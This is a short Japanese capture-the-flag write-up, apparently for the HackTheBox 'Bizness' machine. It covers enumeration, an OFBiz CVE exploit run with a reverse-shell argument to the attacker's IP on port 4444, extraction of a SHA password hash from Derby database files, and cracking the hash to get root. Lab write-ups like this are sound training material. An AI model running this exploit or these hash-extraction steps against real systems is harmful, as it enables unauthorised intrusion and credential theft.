user
- nmap
- ssh, http, ssl/http あたり
- http アクセスでサイトが立ち上がる
- ffuf
- /control
- OFBiz らしい
- こういうのはまず公式サイトから構成を簡単にさらう
- OFBiz
- CVE
- CVE が刺さる
python3 ofbiz_exploit.py <https://bizness.htb> shell IP:4444
- shell
- shell に入れた
- /home/ofbiz/user.txt
root
sudo -l
- Derby
- /opt/ofbiz に色々インストールされてる
- config を見ると SHA が ~ とかいろいろ書かれている
ofbiz@bizness:/opt/ofbiz/framework/security/config$ cat security.properties
- derby に関するファイルを探す
/opt/ofbiz/runtime/data/derby
- 列挙すると seg0 に .dat がたくさん入ってる
find . -type f -name “*.dat” -exec grep “SHA” {} \\;
c5490.dat
がそれっぽいので見る
currentPassword="$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
- これをクラックすればいいんだが全然できない
- ハッシュクラック
- writeup を見るとどうやら base64 でエンコードされているらしい
- base64 -> hashcat で解読する
- root パスワードで su root
- root.txt
base64 エンコードが全然できなかった... 公式ドキュメントを見るとそれっぽいことが書いてあったからこれは調査不足だ...